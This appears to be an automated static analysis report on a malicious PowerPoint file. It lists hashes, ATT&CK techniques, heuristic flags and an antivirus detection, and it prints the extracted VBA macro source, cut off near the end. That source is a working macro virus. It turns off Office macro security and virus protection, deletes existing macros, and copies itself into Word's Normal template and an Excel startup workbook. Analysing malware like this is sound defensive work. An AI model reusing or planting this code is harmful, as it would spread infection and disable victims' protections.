Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a13dac2c6f7b430d…

MALICIOUS

Office (OLE)

107.0 KB Created: 2001-10-29 02:05:31 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: e49236c182da6065c20a0837aaf5d9ea SHA-1: e9bb693a25e673313db8da38e707f9dab24983df SHA-256: a13dac2c6f7b430d09845aae24ed84c22e3d1dc225fc5ae9939956d67d1ee286
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1505.003 Server Software Component: Office Application Startup T1547.001 Registry Run Keys / Startup Folder

This PowerPoint file contains VBA macros, including a Document_Open macro designed to execute automatically. The script attempts to disable macro security settings and inject its code into other Office documents, including the NormalTemplate, by leveraging CreateObject to interact with Excel. This behavior is indicative of a macro-based malware designed for propagation.

Heuristics 3

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5827 bytes
SHA-256: dc30724900d4d32bd85bf45d589cfe399e4f8feeb592f67ebf8c4adfa11dc0d1
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

'kr1tz do this.....!
Private Sub InfectDoc()
On Error Resume Next
Dim InstMast, SaveVict As Boolean
InstMast = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") = ""
Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
    End With
End If
If MacroContainer = NormalTemplate Then
    Set Mast = NormalTemplate.VBProject.VBComponents.Item(1)
    Set Vict = ActiveDocument
    CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines)
ElseIf MacroContainer = ActiveDocument Then
    Set Mast = ActiveDocument.VBProject.VBComponents.Item(1)
    Set Vict = NormalTemplate
    CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines)
End If
DisVirProt
Set xl = CreateObject("Excel.Application")
If UCase(Dir(xl.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
    Set Mastxl = xl.Workbooks.Add
    Mastxl.VBProject.VBComponents("ThisWorkbook").CodeModule.AddFromString CodeMast
    Mastxl.SaveAs FileName:=xl.Application.StartupPath + "\Book1."
End If
xl.Quit
SaveVict = False
If UCase(Mid(Vict.FullName, 1, 3)) <> UCase("DOC") Then SaveVict = True
For Each fVict In Vict.VBProject.VBComponents
    If (fVict.Type <> 100) Then
        Application.OrganizerDelete Vict.FullName, fVict.Name, wdOrganizerObjectProjectItems
    ElseIf (fVict.Type = 100) And (fVict.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then
        fVict.CodeModule.DeleteLines 1, fVict.CodeModule.CountOfLines
        InstMast = True
    End If
Next fVict
Set Vict = Vict.VBProject.VBComponents.Item(1)
If InstMast = True Then
    Vict.CodeModule.AddFromString CodeMast
    If NormalTemplate.Saved = True Then NormalTemplate.Save
    If SaveVict = True Then ActiveDocument.Save
End If
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set Vict = ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule
Set Code = ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule
CodeMast = Code.Lines(1, Code.CountOfLines)
CommandBars("Tools").Controls("Macro").Enabled = False
If UCase(Dir(Application.StartupPath & "\Book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set BookMast = xlApp.Workbooks.Add
BookMast.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, CodeMast.Lines(1, CodeMast.CountOfLines)
BookMast.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
xlApp.Quit
End If
Set wd = CreateObject("Word.Application")
wd.Options.SaveNormalPrompt = False
For i = 1 To wd.NormalTemplate.VBProject.VBComponents.Count
Set wdNT = wd.NormalTemplate.VBProject.VBComponents(i)
If wdNT.Type <> 100 Then
wd.Application.OrganizerDelete wd.NormalTemplate.FullName, wd.NormalTemplate.VBProject.VBComponents(i).Name, wd.wdOrganizerObjectProjectItems
ElseIf (wdNT.Type = 100) And (wdNT.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then
If wdNT.CodeModule.CountOfLines <> 0 Then
wdNT.CodeModule.DeleteLines 1, wdNT.CodeModule.CountOfLines
End If
wd.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString CodeMast
End If
Next i
Set wd = Nothing
wd.Quit
For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(i).CodeModule.Find("'Code", 1, 1, 1000, 1000) = False Then
ActiveWorkbook.VBProject.VBComponents(i).CodeModule.DeleteLines 1, ActiveWorkbook.VBProject.VBComponents(i).CodeModule.CountOfLines
Addi = ActiveWorkbook.VBProjec
... (truncated)